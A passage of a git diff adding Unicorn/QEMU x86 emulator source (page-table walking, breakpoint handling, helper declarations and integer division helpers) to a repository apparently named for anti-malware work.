+ ptep &= pdpe ^ PG_NX_MASK; + if (!(pdpe & PG_ACCESSED_MASK)) { + pdpe |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pdpe_addr, pdpe); + } + if (pdpe & PG_PSE_MASK) { + /* 1 GB page */ + page_size = 1024 * 1024 * 1024; + pte_addr = pdpe_addr; + pte = pdpe; + goto do_check_protect; + } + } else +#endif + { + /* XXX: load them when cr3 is loaded ? */ + pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & + env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + goto do_fault; + } + rsvd_mask |= PG_HI_USER_MASK; + if (pdpe & (rsvd_mask | PG_NX_MASK)) { + goto do_fault_rsvd; + } + ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; + } + + pde_addr = ((pdpe & PG_ADDRESS_MASK) + (((addr >> 21) & 0x1ff) << 3)) & + env->a20_mask; + pde = ldq_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pde & rsvd_mask) { + goto do_fault_rsvd; + } + ptep &= pde ^ PG_NX_MASK; + if (pde & PG_PSE_MASK) { + /* 2 MB page */ + page_size = 2048 * 1024; + pte_addr = pde_addr; + pte = pde; + goto do_check_protect; + } + /* 4 KB page */ + if (!(pde & PG_ACCESSED_MASK)) { + pde |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pde_addr, pde); + } + pte_addr = ((pde & PG_ADDRESS_MASK) + (((addr >> 12) & 0x1ff) << 3)) & + env->a20_mask; + pte = ldq_phys(cs->as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pte & rsvd_mask) { + goto do_fault_rsvd; + } + /* combine pde and pte nx, user and rw protections */ + ptep &= pte ^ PG_NX_MASK; + page_size = 4096; + } else { + uint32_t pde; + + /* page directory entry */ + pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & + env->a20_mask; + pde = ldl_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + goto do_fault; + } + ptep = pde | PG_NX_MASK; + + /* if PSE bit is set, then we use a 4MB page */ + if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { + page_size = 4096 * 1024; + pte_addr = pde_addr; + + /* Bits 20-13 provide bits 
39-32 of the address, bit 21 is reserved. + * Leave bits 20-13 in place for setting accessed/dirty bits below. + */ + pte = pde | ((pde & 0x1fe000) << (32 - 13)); + rsvd_mask = 0x200000; + goto do_check_protect_pse36; + } + + if (!(pde & PG_ACCESSED_MASK)) { + pde |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pde_addr, pde); + } + + /* page directory entry */ + pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & + env->a20_mask; + pte = ldl_phys(cs->as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + goto do_fault; + } + /* combine pde and pte user and rw protections */ + ptep &= pte | PG_NX_MASK; + page_size = 4096; + rsvd_mask = 0; + } + +do_check_protect: + rsvd_mask |= (page_size - 1) & PG_ADDRESS_MASK & ~PG_PSE_PAT_MASK; +do_check_protect_pse36: + if (pte & rsvd_mask) { + goto do_fault_rsvd; + } + ptep ^= PG_NX_MASK; + if ((ptep & PG_NX_MASK) && is_write1 == 2) { + goto do_fault_protect; + } + switch (mmu_idx) { + case MMU_USER_IDX: + if (!(ptep & PG_USER_MASK)) { + goto do_fault_protect; + } + if (is_write && !(ptep & PG_RW_MASK)) { + goto do_fault_protect; + } + break; + + case MMU_KSMAP_IDX: + if (is_write1 != 2 && (ptep & PG_USER_MASK)) { + goto do_fault_protect; + } + /* fall through */ + case MMU_KNOSMAP_IDX: + if (is_write1 == 2 && (env->cr[4] & CR4_SMEP_MASK) && + (ptep & PG_USER_MASK)) { + goto do_fault_protect; + } + if ((env->cr[0] & CR0_WP_MASK) && + is_write && !(ptep & PG_RW_MASK)) { + goto do_fault_protect; + } + break; + + default: /* cannot happen */ + break; + } + is_dirty = is_write && !(pte & PG_DIRTY_MASK); + if (!(pte & PG_ACCESSED_MASK) || is_dirty) { + pte |= PG_ACCESSED_MASK; + if (is_dirty) { + pte |= PG_DIRTY_MASK; + } + stl_phys_notdirty(cs->as, pte_addr, pte); + } + + /* the page can be put in the TLB */ + prot = PAGE_READ; + if (!(ptep & PG_NX_MASK) && + (mmu_idx == MMU_USER_IDX || + !((env->cr[4] & CR4_SMEP_MASK) && (ptep & PG_USER_MASK)))) { + prot |= PAGE_EXEC; + } + if (pte & PG_DIRTY_MASK) { + /* only set write access if 
already dirty... otherwise wait + for dirty access */ + if (is_user) { + if (ptep & PG_RW_MASK) + prot |= PAGE_WRITE; + } else { + if (!(env->cr[0] & CR0_WP_MASK) || + (ptep & PG_RW_MASK)) + prot |= PAGE_WRITE; + } + } + do_mapping: + +#if 0 + pte = pte & env->a20_mask; + + /* align to page_size */ + pte &= PG_ADDRESS_MASK & ~(page_size - 1); + + /* Even if 4MB pages, we map only one 4KB page in the cache to + avoid filling it too fast */ + vaddr = addr & TARGET_PAGE_MASK; + page_offset = vaddr & (page_size - 1); + paddr = pte + page_offset; +#endif + + // Unicorn: indentity map guest virtual address to host virtual address + vaddr = addr & TARGET_PAGE_MASK; + paddr = vaddr; + //printf(">>> map address %"PRIx64" to %"PRIx64"\n", vaddr, paddr); + + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); + return 0; + do_fault_rsvd: + error_code |= PG_ERROR_RSVD_MASK; + do_fault_protect: + error_code |= PG_ERROR_P_MASK; + do_fault: + error_code |= (is_write << PG_ERROR_W_BIT); + if (is_user) + error_code |= PG_ERROR_U_MASK; + if (is_write1 == 2 && + (((env->efer & MSR_EFER_NXE) && + (env->cr[4] & CR4_PAE_MASK)) || + (env->cr[4] & CR4_SMEP_MASK))) + error_code |= PG_ERROR_I_D_MASK; + if (env->intercept_exceptions & (1 << EXCP0E_PAGE)) { + /* cr2 is not modified in case of exceptions */ + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), + addr); + } else { + env->cr[2] = addr; + } + env->error_code = error_code; + cs->exception_index = EXCP0E_PAGE; + return 1; +} + +hwaddr x86_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + target_ulong pde_addr, pte_addr; + uint64_t pte; + uint32_t page_offset; + int page_size; + + if (!(env->cr[0] & CR0_PG_MASK)) { + pte = addr & env->a20_mask; + page_size = 4096; + } else if (env->cr[4] & CR4_PAE_MASK) { + target_ulong pdpe_addr; + uint64_t pde, pdpe; + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint64_t 
pml4e_addr, pml4e; + int32_t sext; + + /* test virtual address sign extension */ + sext = (int64_t)addr >> 47; + if (sext != 0 && sext != -1) { + return -1; + } + pml4e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 39) & 0x1ff) << 3)) & + env->a20_mask; + pml4e = ldq_phys(cs->as, pml4e_addr); + if (!(pml4e & PG_PRESENT_MASK)) { + return -1; + } + pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + + (((addr >> 30) & 0x1ff) << 3)) & env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + return -1; + } + if (pdpe & PG_PSE_MASK) { + page_size = 1024 * 1024 * 1024; + pte = pdpe; + goto out; + } + + } else +#endif + { + pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & + env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) + return -1; + } + + pde_addr = ((pdpe & PG_ADDRESS_MASK) + + (((addr >> 21) & 0x1ff) << 3)) & env->a20_mask; + pde = ldq_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + return -1; + } + if (pde & PG_PSE_MASK) { + /* 2 MB page */ + page_size = 2048 * 1024; + pte = pde; + } else { + /* 4 KB page */ + pte_addr = ((pde & PG_ADDRESS_MASK) + + (((addr >> 12) & 0x1ff) << 3)) & env->a20_mask; + page_size = 4096; + pte = ldq_phys(cs->as, pte_addr); + } + if (!(pte & PG_PRESENT_MASK)) { + return -1; + } + } else { + uint32_t pde; + + /* page directory entry */ + pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & env->a20_mask; + pde = ldl_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) + return -1; + if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { + pte = pde | ((pde & 0x1fe000) << (32 - 13)); + page_size = 4096 * 1024; + } else { + /* page directory entry */ + pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & env->a20_mask; + pte = ldl_phys(cs->as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + return -1; + } + page_size = 4096; + } + pte = pte & env->a20_mask; + } + +#ifdef TARGET_X86_64 +out: +#endif + pte &= PG_ADDRESS_MASK & ~(page_size - 1); + 
page_offset = (addr & TARGET_PAGE_MASK) & (page_size - 1); + return pte | page_offset; +} + +void hw_breakpoint_insert(CPUX86State *env, int index) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + int type = 0, err = 0; + + switch (hw_breakpoint_type(env->dr[7], index)) { + case DR7_TYPE_BP_INST: + if (hw_breakpoint_enabled(env->dr[7], index)) { + err = cpu_breakpoint_insert(cs, env->dr[index], BP_CPU, + &env->cpu_breakpoint[index]); + } + break; + case DR7_TYPE_DATA_WR: + type = BP_CPU | BP_MEM_WRITE; + break; + case DR7_TYPE_IO_RW: + /* No support for I/O watchpoints yet */ + break; + case DR7_TYPE_DATA_RW: + type = BP_CPU | BP_MEM_ACCESS; + break; + } + + if (type != 0) { + err = cpu_watchpoint_insert(cs, env->dr[index], + hw_breakpoint_len(env->dr[7], index), + type, &env->cpu_watchpoint[index]); + } + + if (err) { + env->cpu_breakpoint[index] = NULL; + } +} + +void hw_breakpoint_remove(CPUX86State *env, int index) +{ + CPUState *cs; + + if (!env->cpu_breakpoint[index]) { + return; + } + cs = CPU(x86_env_get_cpu(env)); + switch (hw_breakpoint_type(env->dr[7], index)) { + case DR7_TYPE_BP_INST: + if (hw_breakpoint_enabled(env->dr[7], index)) { + cpu_breakpoint_remove_by_ref(cs, env->cpu_breakpoint[index]); + } + break; + case DR7_TYPE_DATA_WR: + case DR7_TYPE_DATA_RW: + cpu_watchpoint_remove_by_ref(cs, env->cpu_watchpoint[index]); + break; + case DR7_TYPE_IO_RW: + /* No support for I/O watchpoints yet */ + break; + } +} + +bool check_hw_breakpoints(CPUX86State *env, bool force_dr6_update) +{ + target_ulong dr6; + int reg; + bool hit_enabled = false; + + dr6 = env->dr[6] & ~0xf; + for (reg = 0; reg < DR7_MAX_BP; reg++) { + bool bp_match = false; + bool wp_match = false; + + switch (hw_breakpoint_type(env->dr[7], reg)) { + case DR7_TYPE_BP_INST: + if (env->dr[reg] == env->eip) { + bp_match = true; + } + break; + case DR7_TYPE_DATA_WR: + case DR7_TYPE_DATA_RW: + if (env->cpu_watchpoint[reg] && + env->cpu_watchpoint[reg]->flags & BP_WATCHPOINT_HIT) { + wp_match = 
true; + } + break; + case DR7_TYPE_IO_RW: + break; + } + if (bp_match || wp_match) { + dr6 |= 1ULL << reg; + if (hw_breakpoint_enabled(env->dr[7], reg)) { + hit_enabled = true; + } + } + } + + if (hit_enabled || force_dr6_update) { + env->dr[6] = dr6; + } + + return hit_enabled; +} + +void breakpoint_handler(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + CPUBreakpoint *bp; + + if (cs->watchpoint_hit) { + if (cs->watchpoint_hit->flags & BP_CPU) { + cs->watchpoint_hit = NULL; + if (check_hw_breakpoints(env, false)) { + raise_exception(env, EXCP01_DB); + } else { + cpu_resume_from_signal(cs, NULL); + } + } + } else { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == env->eip) { + if (bp->flags & BP_CPU) { + check_hw_breakpoints(env, true); + raise_exception(env, EXCP01_DB); + } + break; + } + } + } +} + +typedef struct MCEInjectionParams { + X86CPU *cpu; + int bank; + uint64_t status; + uint64_t mcg_status; + uint64_t addr; + uint64_t misc; + int flags; +} MCEInjectionParams; + +void cpu_report_tpr_access(CPUX86State *env, TPRAccess access) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + cpu_restore_state(cs, cs->mem_io_pc); + + apic_handle_tpr_access_report(cpu->apic_state, env->eip, access); +} +#endif /* !CONFIG_USER_ONLY */ + +int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, + target_ulong *base, unsigned int *limit, + unsigned int *flags) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + SegmentCache *dt; + target_ulong ptr; + uint32_t e1, e2; + int index; + + if (selector & 0x4) + dt = &env->ldt; + else + dt = &env->gdt; + index = selector & ~7; + ptr = dt->base + index; + if ((uint32_t)(index + 7) > dt->limit + || cpu_memory_rw_debug(cs, ptr, (uint8_t *)&e1, sizeof(e1), 0) != 0 + || cpu_memory_rw_debug(cs, ptr+4, (uint8_t *)&e2, sizeof(e2), 0) != 0) + return 0; + + *base = ((e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000)); + *limit = (e1 & 
0xffff) | (e2 & 0x000f0000); + if (e2 & DESC_G_MASK) + *limit = (*limit << 12) | 0xfff; + *flags = e2; + + return 1; +} + +#if !defined(CONFIG_USER_ONLY) +void do_cpu_init(X86CPU *cpu) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + CPUX86State *save = g_new(CPUX86State, 1); + int sipi = cs->interrupt_request & CPU_INTERRUPT_SIPI; + + *save = *env; + + cpu_reset(cs); + cs->interrupt_request = sipi; + memcpy(&env->start_init_save, &save->start_init_save, + offsetof(CPUX86State, end_init_save) - + offsetof(CPUX86State, start_init_save)); + g_free(save); + + apic_init_reset(env->uc, cpu->apic_state); +} + +void do_cpu_sipi(X86CPU *cpu) +{ + apic_sipi(cpu->apic_state); +} +#else +void do_cpu_init(X86CPU *cpu) +{ +} +void do_cpu_sipi(X86CPU *cpu) +{ +} +#endif + +/* Frob eflags into and out of the CPU temporary format. */ + +void x86_cpu_exec_enter(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + CC_SRC = env->eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); + env->df = 1 - (2 * ((env->eflags >> 10) & 1)); + CC_OP = CC_OP_EFLAGS; + env->eflags &= ~(DF_MASK | CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); +} + +void x86_cpu_exec_exit(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + env->eflags = cpu_compute_eflags(env); + env->eflags0 = env->eflags; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.h new file mode 100644 index 0000000..d3b52d1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.h @@ -0,0 +1,227 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_FLAGS_4(cc_compute_all, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) +DEF_HELPER_FLAGS_4(cc_compute_c, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) + +DEF_HELPER_1(lock, void, env) +DEF_HELPER_1(unlock, void, env) +DEF_HELPER_3(write_eflags, void, env, tl, i32) 
+DEF_HELPER_1(read_eflags, tl, env) +DEF_HELPER_2(divb_AL, void, env, tl) +DEF_HELPER_2(idivb_AL, void, env, tl) +DEF_HELPER_2(divw_AX, void, env, tl) +DEF_HELPER_2(idivw_AX, void, env, tl) +DEF_HELPER_2(divl_EAX, void, env, tl) +DEF_HELPER_2(idivl_EAX, void, env, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_2(divq_EAX, void, env, tl) +DEF_HELPER_2(idivq_EAX, void, env, tl) +#endif + +DEF_HELPER_2(aam, void, env, int) +DEF_HELPER_2(aad, void, env, int) +DEF_HELPER_1(aaa, void, env) +DEF_HELPER_1(aas, void, env) +DEF_HELPER_1(daa, void, env) +DEF_HELPER_1(das, void, env) + +DEF_HELPER_2(lsl, tl, env, tl) +DEF_HELPER_2(lar, tl, env, tl) +DEF_HELPER_2(verr, void, env, tl) +DEF_HELPER_2(verw, void, env, tl) +DEF_HELPER_2(lldt, void, env, int) +DEF_HELPER_2(ltr, void, env, int) +DEF_HELPER_3(load_seg, void, env, int, int) +DEF_HELPER_4(ljmp_protected, void, env, int, tl, int) +DEF_HELPER_5(lcall_real, void, env, int, tl, int, int) +DEF_HELPER_5(lcall_protected, void, env, int, tl, int, int) +DEF_HELPER_2(iret_real, void, env, int) +DEF_HELPER_3(iret_protected, void, env, int, int) +DEF_HELPER_3(lret_protected, void, env, int, int) +DEF_HELPER_2(read_crN, tl, env, int) +DEF_HELPER_3(write_crN, void, env, int, tl) +DEF_HELPER_2(lmsw, void, env, tl) +DEF_HELPER_1(clts, void, env) +DEF_HELPER_3(movl_drN_T0, void, env, int, tl) +DEF_HELPER_2(invlpg, void, env, tl) + +DEF_HELPER_4(enter_level, void, env, int, int, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_4(enter64_level, void, env, int, int, tl) +#endif +DEF_HELPER_2(sysenter, void, env, int) +DEF_HELPER_2(sysexit, void, env, int) +#ifdef TARGET_X86_64 +DEF_HELPER_2(syscall, void, env, int) +DEF_HELPER_2(sysret, void, env, int) +#endif +DEF_HELPER_2(hlt, void, env, int) +DEF_HELPER_2(monitor, void, env, tl) +DEF_HELPER_2(mwait, void, env, int) +DEF_HELPER_2(pause, void, env, int) +DEF_HELPER_1(debug, void, env) +DEF_HELPER_1(reset_rf, void, env) +DEF_HELPER_3(raise_interrupt, void, env, int, int) +DEF_HELPER_2(raise_exception, void, 
env, int) +DEF_HELPER_1(cli, void, env) +DEF_HELPER_1(sti, void, env) +DEF_HELPER_1(clac, void, env) +DEF_HELPER_1(stac, void, env) +DEF_HELPER_1(set_inhibit_irq, void, env) +DEF_HELPER_1(reset_inhibit_irq, void, env) +DEF_HELPER_3(boundw, void, env, tl, int) +DEF_HELPER_3(boundl, void, env, tl, int) +DEF_HELPER_1(rsm, void, env) +DEF_HELPER_2(into, void, env, int) +DEF_HELPER_2(cmpxchg8b, void, env, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_2(cmpxchg16b, void, env, tl) +#endif +DEF_HELPER_1(single_step, void, env) +DEF_HELPER_1(cpuid, void, env) +DEF_HELPER_1(rdtsc, void, env) +DEF_HELPER_1(rdtscp, void, env) +DEF_HELPER_1(rdpmc, void, env) +DEF_HELPER_1(rdmsr, void, env) +DEF_HELPER_1(wrmsr, void, env) + +DEF_HELPER_2(check_iob, void, env, i32) +DEF_HELPER_2(check_iow, void, env, i32) +DEF_HELPER_2(check_iol, void, env, i32) +DEF_HELPER_3(outb, void, ptr, i32, i32) +DEF_HELPER_2(inb, tl, ptr, i32) +DEF_HELPER_3(outw, void, ptr, i32, i32) +DEF_HELPER_2(inw, tl, ptr, i32) +DEF_HELPER_3(outl, void, ptr, i32, i32) +DEF_HELPER_2(inl, tl, ptr, i32) + +DEF_HELPER_3(svm_check_intercept_param, void, env, i32, i64) +DEF_HELPER_3(vmexit, void, env, i32, i64) +DEF_HELPER_4(svm_check_io, void, env, i32, i32, i32) +DEF_HELPER_3(vmrun, void, env, int, int) +DEF_HELPER_1(vmmcall, void, env) +DEF_HELPER_2(vmload, void, env, int) +DEF_HELPER_2(vmsave, void, env, int) +DEF_HELPER_1(stgi, void, env) +DEF_HELPER_1(clgi, void, env) +DEF_HELPER_1(skinit, void, env) +DEF_HELPER_2(invlpga, void, env, int) + +/* x86 FPU */ + +DEF_HELPER_2(flds_FT0, void, env, i32) +DEF_HELPER_2(fldl_FT0, void, env, i64) +DEF_HELPER_2(fildl_FT0, void, env, s32) +DEF_HELPER_2(flds_ST0, void, env, i32) +DEF_HELPER_2(fldl_ST0, void, env, i64) +DEF_HELPER_2(fildl_ST0, void, env, s32) +DEF_HELPER_2(fildll_ST0, void, env, s64) +DEF_HELPER_1(fsts_ST0, i32, env) +DEF_HELPER_1(fstl_ST0, i64, env) +DEF_HELPER_1(fist_ST0, s32, env) +DEF_HELPER_1(fistl_ST0, s32, env) +DEF_HELPER_1(fistll_ST0, s64, env) 
+DEF_HELPER_1(fistt_ST0, s32, env) +DEF_HELPER_1(fisttl_ST0, s32, env) +DEF_HELPER_1(fisttll_ST0, s64, env) +DEF_HELPER_2(fldt_ST0, void, env, tl) +DEF_HELPER_2(fstt_ST0, void, env, tl) +DEF_HELPER_1(fpush, void, env) +DEF_HELPER_1(fpop, void, env) +DEF_HELPER_1(fdecstp, void, env) +DEF_HELPER_1(fincstp, void, env) +DEF_HELPER_2(ffree_STN, void, env, int) +DEF_HELPER_1(fmov_ST0_FT0, void, env) +DEF_HELPER_2(fmov_FT0_STN, void, env, int) +DEF_HELPER_2(fmov_ST0_STN, void, env, int) +DEF_HELPER_2(fmov_STN_ST0, void, env, int) +DEF_HELPER_2(fxchg_ST0_STN, void, env, int) +DEF_HELPER_1(fcom_ST0_FT0, void, env) +DEF_HELPER_1(fucom_ST0_FT0, void, env) +DEF_HELPER_1(fcomi_ST0_FT0, void, env) +DEF_HELPER_1(fucomi_ST0_FT0, void, env) +DEF_HELPER_1(fadd_ST0_FT0, void, env) +DEF_HELPER_1(fmul_ST0_FT0, void, env) +DEF_HELPER_1(fsub_ST0_FT0, void, env) +DEF_HELPER_1(fsubr_ST0_FT0, void, env) +DEF_HELPER_1(fdiv_ST0_FT0, void, env) +DEF_HELPER_1(fdivr_ST0_FT0, void, env) +DEF_HELPER_2(fadd_STN_ST0, void, env, int) +DEF_HELPER_2(fmul_STN_ST0, void, env, int) +DEF_HELPER_2(fsub_STN_ST0, void, env, int) +DEF_HELPER_2(fsubr_STN_ST0, void, env, int) +DEF_HELPER_2(fdiv_STN_ST0, void, env, int) +DEF_HELPER_2(fdivr_STN_ST0, void, env, int) +DEF_HELPER_1(fchs_ST0, void, env) +DEF_HELPER_1(fabs_ST0, void, env) +DEF_HELPER_1(fxam_ST0, void, env) +DEF_HELPER_1(fld1_ST0, void, env) +DEF_HELPER_1(fldl2t_ST0, void, env) +DEF_HELPER_1(fldl2e_ST0, void, env) +DEF_HELPER_1(fldpi_ST0, void, env) +DEF_HELPER_1(fldlg2_ST0, void, env) +DEF_HELPER_1(fldln2_ST0, void, env) +DEF_HELPER_1(fldz_ST0, void, env) +DEF_HELPER_1(fldz_FT0, void, env) +DEF_HELPER_1(fnstsw, i32, env) +DEF_HELPER_1(fnstcw, i32, env) +DEF_HELPER_2(fldcw, void, env, i32) +DEF_HELPER_1(fclex, void, env) +DEF_HELPER_1(fwait, void, env) +DEF_HELPER_1(fninit, void, env) +DEF_HELPER_2(fbld_ST0, void, env, tl) +DEF_HELPER_2(fbst_ST0, void, env, tl) +DEF_HELPER_1(f2xm1, void, env) +DEF_HELPER_1(fyl2x, void, env) +DEF_HELPER_1(fptan, void, 
env) +DEF_HELPER_1(fpatan, void, env) +DEF_HELPER_1(fxtract, void, env) +DEF_HELPER_1(fprem1, void, env) +DEF_HELPER_1(fprem, void, env) +DEF_HELPER_1(fyl2xp1, void, env) +DEF_HELPER_1(fsqrt, void, env) +DEF_HELPER_1(fsincos, void, env) +DEF_HELPER_1(frndint, void, env) +DEF_HELPER_1(fscale, void, env) +DEF_HELPER_1(fsin, void, env) +DEF_HELPER_1(fcos, void, env) +DEF_HELPER_3(fstenv, void, env, tl, int) +DEF_HELPER_3(fldenv, void, env, tl, int) +DEF_HELPER_3(fsave, void, env, tl, int) +DEF_HELPER_3(frstor, void, env, tl, int) +DEF_HELPER_3(fxsave, void, env, tl, int) +DEF_HELPER_3(fxrstor, void, env, tl, int) + +DEF_HELPER_FLAGS_1(clz_x86, TCG_CALL_NO_RWG_SE, tl, tl) + +#ifdef TARGET_I386 +#define helper_clz helper_clz_x86 +#define gen_helper_clz gen_helper_clz_x86 +#endif + +DEF_HELPER_FLAGS_1(ctz, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_2(pdep, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(pext, TCG_CALL_NO_RWG_SE, tl, tl, tl) + +/* MMX/SSE */ + +DEF_HELPER_2(ldmxcsr, void, env, i32) +DEF_HELPER_1(enter_mmx, void, env) +DEF_HELPER_1(emms, void, env) +DEF_HELPER_3(movq, void, env, ptr, ptr) + +#define SHIFT 0 +#include "ops_sse_header.h" +#define SHIFT 1 +#include "ops_sse_header.h" + +DEF_HELPER_3(rclb, tl, env, tl, tl) +DEF_HELPER_3(rclw, tl, env, tl, tl) +DEF_HELPER_3(rcll, tl, env, tl, tl) +DEF_HELPER_3(rcrb, tl, env, tl, tl) +DEF_HELPER_3(rcrw, tl, env, tl, tl) +DEF_HELPER_3(rcrl, tl, env, tl, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_3(rclq, tl, env, tl, tl) +DEF_HELPER_3(rcrq, tl, env, tl, tl) +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/int_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/int_helper.c new file mode 100644 index 0000000..0de38c1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/int_helper.c @@ -0,0 +1,471 @@ +/* + * x86 integer helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify 
it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/host-utils.h" +#include "exec/helper-proto.h" + +//#define DEBUG_MULDIV + +/* modulo 9 table */ +static const uint8_t rclb_table[32] = { + 0, 1, 2, 3, 4, 5, 6, 7, + 8, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 0, 1, 2, 3, 4, 5, + 6, 7, 8, 0, 1, 2, 3, 4, +}; + +/* modulo 17 table */ +static const uint8_t rclw_table[32] = { + 0, 1, 2, 3, 4, 5, 6, 7, + 8, 9, 10, 11, 12, 13, 14, 15, + 16, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, +}; + +/* division, flags are undefined */ + +void helper_divb_AL(CPUX86State *env, target_ulong t0) +{ + unsigned int num, den, q, r; + + num = (env->regs[R_EAX] & 0xffff); + den = (t0 & 0xff); + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + if (q > 0xff) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xff; + r = (num % den) & 0xff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; +} + +void helper_idivb_AL(CPUX86State *env, target_ulong t0) +{ + int num, den, q, r; + + num = (int16_t)env->regs[R_EAX]; + den = (int8_t)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + if (q != (int8_t)q) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xff; + r = (num % den) & 0xff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; +} + +void helper_divw_AX(CPUX86State *env, target_ulong t0) +{ + unsigned int num, den, q, r; + + num = (env->regs[R_EAX] & 0xffff) 
| ((env->regs[R_EDX] & 0xffff) << 16); + den = (t0 & 0xffff); + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + if (q > 0xffff) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xffff; + r = (num % den) & 0xffff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; + env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; +} + +void helper_idivw_AX(CPUX86State *env, target_ulong t0) +{ + int num, den, q, r; + + num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); + den = (int16_t)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = ((int64_t)num / den); + if (q != (int16_t)q) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xffff; + r = (num % den) & 0xffff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; + env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; +} + +void helper_divl_EAX(CPUX86State *env, target_ulong t0) +{ + unsigned int den, r; + uint64_t num, q; + + num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + den = (unsigned int)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + r = (num % den); + if (q > 0xffffffff) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = (uint32_t)q; + env->regs[R_EDX] = (uint32_t)r; +} + +void helper_idivl_EAX(CPUX86State *env, target_ulong t0) +{ + int den, r; + 